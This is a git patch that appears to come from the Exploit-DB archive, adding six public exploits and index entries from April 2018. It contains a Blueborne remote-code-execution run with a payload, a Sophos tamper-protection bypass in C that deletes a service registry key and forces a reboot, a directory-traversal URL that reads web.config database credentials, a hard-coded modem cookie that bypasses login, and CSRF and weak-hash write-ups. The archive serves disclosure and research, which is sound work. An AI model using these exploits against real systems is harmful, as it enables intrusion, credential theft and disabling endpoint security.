From 4088e4151bb6d9255196fed4db6c1243751c3308 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 7 Apr 2018 05:01:44 +0000 Subject: [PATCH] DB: 2018-04-07 6 changes to exploits/shellcodes Sophos Endpoint Protection 10.7 - Tamper-Protection Bypass Sophos Endpoint Protection Control Panel 10.7 - Weak Password Encryption LineageOS 14.1 Blueborne - Remote Code Execution FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass DotNetNuke DNNarticle Module 11 - Directory Traversal Cobub Razor 0.7.2 - Cross Site Request Forgery --- exploits/android/remote/44415.txt | 86 +++++++++++++++++++++ exploits/hardware/webapps/44413.txt | 55 ++++++++++++++ exploits/php/webapps/44416.txt | 22 ++++++ exploits/windows/local/44410.txt | 111 ++++++++++++++++++++++++++++ exploits/windows/local/44411.txt | 90 ++++++++++++++++++++++ exploits/windows/webapps/44414.txt | 66 +++++++++++++++++ files_exploits.csv | 6 ++ 7 files changed, 436 insertions(+) create mode 100644 exploits/android/remote/44415.txt create mode 100644 exploits/hardware/webapps/44413.txt create mode 100644 exploits/php/webapps/44416.txt create mode 100644 exploits/windows/local/44410.txt create mode 100644 exploits/windows/local/44411.txt create mode 100644 exploits/windows/webapps/44414.txt diff --git a/exploits/android/remote/44415.txt b/exploits/android/remote/44415.txt new file mode 100644 index 000000000..856d1dc59 --- /dev/null +++ b/exploits/android/remote/44415.txt @@ -0,0 +1,86 @@ +# Exploit Title: LineageOS 14.1 (Android 7.1.2) Blueborne RCE CVE-2017-0781 +# Date: 04/01/2018 +# Exploit Author: Marcin Kozlowski +# Tested on: LinageOS 14.1 (Android 7.1.2) without BlueBorne Patch +# CVE : CVE-2017-0781 + +# Provided for legal security research and testing purposes ONLY. + +Code in exp4.py + +More info in Repo: + +https://github.com/marcinguy/android712-blueborne + +Sample Execution: + +$python exp4.py hci0 84:55:A5:B6:6F:F6 +[*] Pwn attempt 0: +[*] Set hci0 to new rand BDADDR 16:e1:66:a7:8a:3d +[↘] Doing stack memeory leak... +00: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 +00000000 +01: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 +00000000 +02: 00000000 00000000 00000000 ad0911c4 9a2ed2c8 00000018 00000044 acf3de5d +acf4d67d +03: acf475e1 ad0911c4 a7c61ac0 16e166a7 00008a3d 00000000 b4300500 b4300970 +1187a437 +04: 00000000 9a2ed2a8 000003f3 00020001 9a2e0700 acfac80a b2f1fee0 ad08fb74 +b5215a97 +05: b4300500 b4300970 b2f1d220 00000000 00000001 b5225001 1187a437 00000000 +00000000 +06: a7c38bc0 aa5753c0 aa5753c8 b2f79360 00000008 00000000 b5233a89 00000001 +00000000 +07: 00000000 00000000 ad08fb74 acf61330 1187a437 00000008 a7c38bc0 b2f79360 +acfc9968 +08: b2f79360 00000000 a7c0f0e8 a7c38bc0 b2f79360 acfc9968 acf588f7 00000000 +a7c38bc0 +09: a7c00000 b4300500 00000003 a7c63b60 a7c00000 b4300500 b4300a78 aa5753c8 +a7c63b60 +10: ad0911c4 ad08fb74 b5225d3b 00000063 aa5753c8 b4300500 00000000 aa5753c8 +b5225d67 +11: acf3e0f5 ad07a770 00000000 a7c63b60 00000013 b5235ad5 00000063 a7c63b60 +b4300500 +12: b4300970 b2f1d418 00000000 00000001 b5225001 1187a437 a7c63b60 00000044 +00000013 +13: 00000000 00000044 a7c63b60 ad0911c4 ad08fb74 acf3df91 00000040 a7c63b70 +00000000 +14: acf472db a7c0fa24 b5225d3b 0000001d aa5753c8 b4300500 00000000 aa5753c8 +b5225d67 +15: 9a2ed4b0 a7c0f778 0000000f b2f1d298 00000000 b5235ad5 0000001d b2f1d298 +aa5753c8 +16: 00000000 9a2ed8d8 00000000 9a2ed4b0 b5235d03 00000000 9a2ed4b0 1187a437 +00000008 +17: b2f1d430 1187a437 a7c0f250 b2f1d298 9a2ed8d8 b51ea361 00000001 00000000 +a7c0f778 +18: 1187a437 9a2ed8d8 acf59793 1187a437 a7c0f780 00000001 a7c0fa18 9a2ed8d8 +00000000 +19: 9a2ed4b0 a7c0f778 a7c0fa24 acf58f85 00000001 0000003e a7c0fa18 00000000 +00000005 +[*] LIBC 0xb51ea361 +[*] BT 0xacf4d67d +[*] libc_base: 0xb5142000, bss_base: 0xacece000 +[*] system: 0xb5216b4d, acl_name: 0xad08160c +[*] Set hci0 to new rand BDADDR e3:83:0c:ab:03:c6 +[*] system 0xb5216b4d +[*] PAYLOAD "\x17\xaa\xaaAAAAMk!\xb5"; + touch /data/local/tmp/test + # +[+] Connecting to BNEP again: Done +[+] Pwning...: Done +[*] Looks like it didn't crash. Possibly worked + + +Payload executed: + +s3ve3g:/ # ls -la /data/local/tmp/ + +total 24 +drwxrwxrwx 2 shell shell 4096 2014-01-13 02:05 . +drwxr-x--x 3 root root 4096 2014-01-22 00:36 .. +-rw------- 1 root root 5773 2018-03-25 12:51 apt.conf.owMBvd +-rw------- 1 root root 1182 2018-03-25 12:51 apt.data.HdUevr +-rw------- 1 root root 455 2018-03-25 12:51 apt.sig.kv2PHc +-rw------- 1 1002 1002 0 2014-01-13 02:05 test +s3ve3g:/ # \ No newline at end of file diff --git a/exploits/hardware/webapps/44413.txt b/exploits/hardware/webapps/44413.txt new file mode 100644 index 000000000..fa086d874 --- /dev/null +++ b/exploits/hardware/webapps/44413.txt @@ -0,0 +1,55 @@ +# Exploit Title: FiberHome VDSL2 Modem HG 150-UB Authentication Bypass +# Date: 04/03/2018 +# Exploit Author: Noman Riffat +# Vendor Homepage: http://www.fiberhome.com/ +# CVE : CVE-2018-9248, CVE-2018-9248 + +The vulnerability exists in plain text & hard coded cookie. Using any +cookie manager extension, an attacker can bypass login page by setting the +following Master Cookie. + +Cookie: Name=0admin + +Then access the homepage which will no longer require authentication. +http://192.168.10.1/ + +Due to improper session implementation, there is another way to bypass +login. The response header of homepage without authentication looks like +this. + +HTTP/1.1 200 Ok +Server: micro_httpd +Cache-Control: no-cache +Date: Tue, 03 Apr 2018 18:33:12 GMT +Set-Cookie: Name=; path=/ +Content-Type: text/html +Connection: close + +HTTP/1.1 200 Ok +Server: micro_httpd +Cache-Control: no-cache +Date: Tue, 03 Apr 2018 18:33:12 GMT +Content-Type: text/html +Connection: close + + + +.. continue to actual homepage source + +The response header looks totally messed up and by triggering burp suite +and modifying it to following will grant access to homepage without +authentication. + +HTTP/1.1 200 Ok +Server: micro_httpd +Cache-Control: no-cache +Date: Tue, 03 Apr 2018 18:33:12 GMT +Set-Cookie: Name=; path=/ +Content-Type: text/html +Connection: close + + + +.. continue to actual homepage source \ No newline at end of file diff --git a/exploits/php/webapps/44416.txt b/exploits/php/webapps/44416.txt new file mode 100644 index 000000000..facc0d5d9 --- /dev/null +++ b/exploits/php/webapps/44416.txt @@ -0,0 +1,22 @@ +# Exploit Title: [Cobub Razor 0.7.2 Cross Site Request Forgery] +# Date: [2018-03-07] +# Exploit Author: [ppb(ppb@5ecurity.cn)] +# Vendor Homepage: [https://github.com/cobub/razor/] +# Software Link: [https://github.com/cobub/razor/] +# Version: [0.72] +# CVE : [CVE-2018-7746] + +There is a vulnerability. Authentication is not required for /index.php?/manage/channel/modifychannel. For example, with a crafted channel name, stored XSS is triggered during a later /index.php?/manage/channel request by an admin. + + + + + +
+ + + + +
+ + \ No newline at end of file diff --git a/exploits/windows/local/44410.txt b/exploits/windows/local/44410.txt new file mode 100644 index 000000000..eb8571a13 --- /dev/null +++ b/exploits/windows/local/44410.txt @@ -0,0 +1,111 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/SOPHOS-ENDPOINT-PROTECTION-v10.7-TAMPER-PROTECTION-BYPASS-CVE-2018-4863.txt +[+] ISR: Apparition Security + + + +Vendor: +============= +www.sophos.com + + + +Product: +=========== +Sophos Endpoint Protection v10.7 + +Sophos Endpoint Protection helps secure your workstation by adding prevention, detection, and response technology on top of your operating system. +Sophos Endpoint Protection is designed for workstations running Windows and macOS. It adds exploit technique mitigations, CryptoGuard anti-ransomware, +anti-malware, web security, malicious traffic detection, and deep system cleanup. + + + +Vulnerability Type: +=================== +Tamper Protection Bypass + + +CVE Reference: +============== +CVE-2018-4863 + + +Security Issue: +================ +Sophos Endpoint Protection offers an enhanced tamper protection mechanism disallowing changes to be made to the Windows registry +by creating and setting a special registry key "SEDEnabled" as follows: + +HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Endpoint Defense\TamperProtection\Config +Create the following registry key: +"SEDEnabled"=dword:00000001" + +From "https://community.sophos.com/kb/en-us/124376" documentation: +"You must enable the basic Tamper Protection feature on an endpoint in order to use the Enhanced Tamper Protection" + +However, this protection mechanism can be bypassed by deleting the following registry key as it is not sufficiently protected. +"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Sophos Endpoint Defense\" + +By deleting this key this bypasses the Sophos Endpoint "Enhanced Tamper Protection" once the system has been rebooted. +Attackers can then create arbitrary registry keys or edit keys and settings under the protected "tamper" protection config key. +The issue undermines the integrity of the endpoint protection as deleting this key stops the tamper protect driver from loading. + + +SAV OPM customers are unaffected from 10.8.1 onwards, all Central managed customers customers are unaffected. +All SAV OPM Preview subscribers have had the fix since 2018-03-01. + + + +Exploit/POC: +============= +Compile the below malicious POC "C" code and run on target, PC will reboot then we pwn. + +gcc -o sophos-poc.exe sophos-poc.c + +"sophos-poc.c" + +/***SOPHOS ANTIVIRUS ENDPOINT ENHANCED TAMPER PROTECTION BYPASS +Even with "SEDEnabled"=dword:00000001" set in registry to prevent tampering +https://community.sophos.com/kb/en-us/124376 +By hyp3rlinx **/ + +int main(void){ + system("reg delete \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Sophos Endpoint Defense\" /f"); + system("shutdown -t 0 -r -f"); +return 0; +} + + + +Network Access: +=============== +Local + + + +Severity: +========= +High + + + +Disclosure Timeline: +============================= +Vendor Notification: December 4, 2017 +Vendor Acknowledgement: December 12, 2017 +Vendor release fixes: March 1, 2018 +Vendor request additional time before disclosing. +additional time has passed. +April 4, 2018 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/exploits/windows/local/44411.txt b/exploits/windows/local/44411.txt new file mode 100644 index 000000000..479e79e1b --- /dev/null +++ b/exploits/windows/local/44411.txt @@ -0,0 +1,90 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/SOPHOS-ENDPOINT-PROTECTION-CONTROL-PANEL-v10.7-INSECURE-CRYPTO-CVE-2018-9233.txt +[+] ISR: Apparition Security + + + +Vendor: +========== +www.sophos.com + + + +Product: +=========== +Sophos Endpoint Protection - Control Panel v10.7 + +Sophos Endpoint Protection helps secure your workstation by adding prevention, detection, and response technology on top of your operating system. +Sophos Endpoint Protection is designed for workstations running Windows and macOS. It adds exploit technique mitigations, CryptoGuard anti-ransomware, +anti-malware, web security, malicious traffic detection, and deep system cleanup. + + + +Vulnerability Type: +=================== +Insecure Crypto + + + +CVE Reference: +============== +CVE-2018-9233 + + + +Security Issue: +================ +Sophos endpoint protection control panel authentication uses weak unsalted unicoded cryptographic hash (SHA1) function, not using salt allows attackers that gain access to hash +ability to conduct faster cracking attacks using pre-computed dictionaries, e.g. rainbow tables. This can potentially result in unauthorized access that could allow for +changing of settings, whitelist or unquarantine files. + +Password and config for Sophos endpoint protection control panel is stored here: +C:\ProgramData\Sophos\Sophos Anti-Virus\Config\machine.xml + +e.g. + +SHA1 (Unicode) encoding non salted pass = abc123 + + +true689307D2FC53AF0FB941BC1BB42737CE4F3EF540 + + + +Using PHP's sha1 function with "mb_convert_encoding" as UTF-16LE we can verify. + +C:\>php -r "print sha1(mb_convert_encoding('abc123', 'UTF-16LE', 'UTF-8'));" +689307d2fc53af0fb941bc1bb42737ce4f3ef540 + + + +Network Access: +=============== +Local + + + +Severity: +========= +Low + + +Disclosure Timeline: +============================= +Vendor Notification: December 4, 2017 +Vendor Acknowledgement: December 12, 2017 +Vendor request additional time before disclosing. +additional time has passed. +April 4, 2018 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/exploits/windows/webapps/44414.txt b/exploits/windows/webapps/44414.txt new file mode 100644 index 000000000..68ff07aef --- /dev/null +++ b/exploits/windows/webapps/44414.txt @@ -0,0 +1,66 @@ + ############################## + +01. ### Advisory Information ### +Title: Directory Traversal Vulnerability in DNNarticle module +Date published: n/a +Date of last update: n/a +Vendors contacted: zldnn.com +Discovered by: Esmaeil Rahimian +Severity: Critical + +02. ### Vulnerability Information ### + +OVE-ID: CVE-2018-9126. + +03. ### Introduction ### + +DNN Article is not only a powerful module to enable post and manage +articles, but also provides total solutions for content management. Content +such as articles, news, announcements, product catalogs, etc can be +organized into unlimited levels of categories. New content can be moderated +before published. The administrator can assign roles as moderator. Also an +email can be sent when new content is added. Visitors can make comment and +rating. They can also agree or disagree an article. The product supports +common features of DotNetNuke module such as localization, portable +interface, search, Syndication etc. It can integrate with Twitter, +Facebook, Google Map, Windows Live Writer and DotNetNuke Journal to provide +more powerful functions for your portals. DNNArticle is an extendable +system. There are several sub modules shipped with DNNArticle standard +edition to provide rich and attractive look and feel experiences. There are +also several optional sub modules that provide more features. And the +number of optional sub modules is growing continually. There are also +several applications based on DNNArticle such as DNNArticle Blog and +DNNArticle Product. DNNArticle fully supports template and CSS theme. This +feature provides more flexibility for users to build more attractive user +interface. + +zldnn.com + +04. ### Vulnerability Description ### + +The DNNArticle module 11 for DNN (formerly DotNetNuke) allows remote +attackers to read the web.config file, and consequently +discover database credentials, via the /GetCSS.ashx/?CP=%2fweb.config URI. + + +05. ### Technical Description / Proof of Concept Code ### +desktopmodules/DNNArticle/GetCSS.ashx/?CP=%2fweb.config&smid=512&portalid=3 +with this link the attacker can see the web.config file and find DB name +and see the user name and passwords of DB + +06. ### Affected Product Code Base ### +DnnArticle Module for DotNet Nuke - 11 +Affected Component: +DNNArticle Module +[Attack Type] +Remote +[Impact Information Disclosure] +True +[Attack Vectors] +Attacker can see the web.config file that contain critical information +06. ### Credits ### + +SecureHost[Research Team] - www.securehost.co + +This vulnerability has been discovered by: +Esmaeil Rahimian - [www.securehost.co] - Rahimian(at)SecureHost(dot)co \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index c0e3b7236..8d3edd7a2 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -9633,6 +9633,8 @@ id,file,description,date,author,type,platform,port 44365,exploits/windows/local/44365.py,"Allok WMV to AVI MPEG DVD WMV Converter 4.6.1217 - Buffer Overflow",2018-03-30,"Mohan Ravichandran and Velayutham Selvaraj",local,windows, 44382,exploits/windows/local/44382.py,"Faleemi Windows Desktop Software - (DDNS/IP) Local Buffer Overflow",2018-03-30,"Himavanth Reddy",local,windows, 44389,exploits/windows/local/44389.txt,"WebLog Expert Enterprise 9.4 - Privilege Escalation",2018-04-02,bzyo,local,windows, +44410,exploits/windows/local/44410.txt,"Sophos Endpoint Protection 10.7 - Tamper-Protection Bypass",2018-04-06,hyp3rlinx,local,windows, +44411,exploits/windows/local/44411.txt,"Sophos Endpoint Protection Control Panel 10.7 - Weak Password Encryption",2018-04-06,hyp3rlinx,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -16378,6 +16380,7 @@ id,file,description,date,author,type,platform,port 44357,exploits/windows/remote/44357.rb,"Exodus Wallet (ElectronJS Framework) - Remote Code Execution (Metasploit)",2018-03-29,Metasploit,remote,windows, 44376,exploits/windows/remote/44376.py,"Advantech WebAccess < 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow",2018-03-30,"Chris Lyne",remote,windows,4592 44398,exploits/hardware/remote/44398.py,"Moxa AWK-3131A 1.4 < 1.7 - 'Username' OS Command Injection",2017-04-03,Talos,remote,hardware, +44415,exploits/android/remote/44415.txt,"LineageOS 14.1 Blueborne - Remote Code Execution",2018-04-06,"Marcin Kozlowski",remote,android, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -39107,3 +39110,6 @@ id,file,description,date,author,type,platform,port 44406,exploits/php/webapps/44406.txt,"Z-Blog 1.5.1.1740 - Cross-Site Scripting",2018-04-05,zzw,webapps,php, 44407,exploits/php/webapps/44407.txt,"Z-Blog 1.5.1.1740 - Full Path Disclosure",2018-04-05,zzw,webapps,php, 44408,exploits/php/webapps/44408.txt,"GetSimple CMS 3.3.13 - Cross-Site Scripting",2018-04-05,"Sureshbabu Narvaneni",webapps,php, +44413,exploits/hardware/webapps/44413.txt,"FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass",2018-04-06,"Noman Riffat",webapps,hardware, +44414,exploits/windows/webapps/44414.txt,"DotNetNuke DNNarticle Module 11 - Directory Traversal",2018-04-06,"Esmaeil Rahimian",webapps,windows, +44416,exploits/php/webapps/44416.txt,"Cobub Razor 0.7.2 - Cross Site Request Forgery",2018-04-06,ppb,webapps,php,